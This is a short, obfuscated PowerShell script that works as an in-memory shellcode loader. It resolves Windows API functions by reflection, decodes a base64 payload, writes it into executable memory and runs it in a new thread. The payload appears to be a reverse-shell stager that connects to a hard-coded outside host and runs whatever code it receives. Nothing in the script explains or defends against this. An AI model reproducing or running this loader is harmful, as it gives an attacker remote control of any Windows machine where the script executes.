function iq { Param ($cy, $jP4O) $vRGJw = ([AppDomain]::Curren

1. function iq {
2.         Param ($cy, $jP4O)
3.         $vRGJw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5.         return $vRGJw.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($vRGJw.GetMethod('GetModuleHandle')).Invoke($null, @($cy)))), $jP4O))
6. }
7.  
8. function kx {
9.         Param (
10.                 [Parameter(Position = 0, Mandatory = $True)] [Type[]] $dkSjD,
11.                 [Parameter(Position = 1)] [Type] $bBh = [Void]
12.         )
13.  
14.         $l1TA5 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15.         $l1TA5.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $dkSjD).SetImplementationFlags('Runtime, Managed')
16.         $l1TA5.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $bBh, $dkSjD).SetImplementationFlags('Runtime, Managed')
17.  
18.         return $l1TA5.CreateType()
19. }
20.  
21. [Byte[]]$q8G = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgTTHJSA+3SkpIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJIi1Igi0I8SAHQQVFmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ESLQCBQSQHQi0gY41ZI/8lBizSITTHJSAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAEo9V2KVAkFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//VSAHDSCnGSIX2deFB/+c=")
22. [Uint32]$ob = 0
23. $jNJY = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iq kernel32.dll VirtualAlloc), (kx @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $q8G.Length,0x3000, 0x04)
24.  
25. [System.Runtime.InteropServices.Marshal]::Copy($q8G, 0, $jNJY, $q8G.length)
26. if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iq kernel32.dll VirtualProtect), (kx @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($jNJY, [Uint32]$q8G.Length, 0x10, [Ref]$ob)) -eq $true) {
27.         $yUGV = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iq kernel32.dll CreateThread), (kx @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$jNJY,[IntPtr]::Zero,0,[IntPtr]::Zero)
28.         [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iq kernel32.dll WaitForSingleObject), (kx @([IntPtr], [Int32]))).Invoke($yUGV,0xffffffff) | Out-Null
29. }
30.  
31.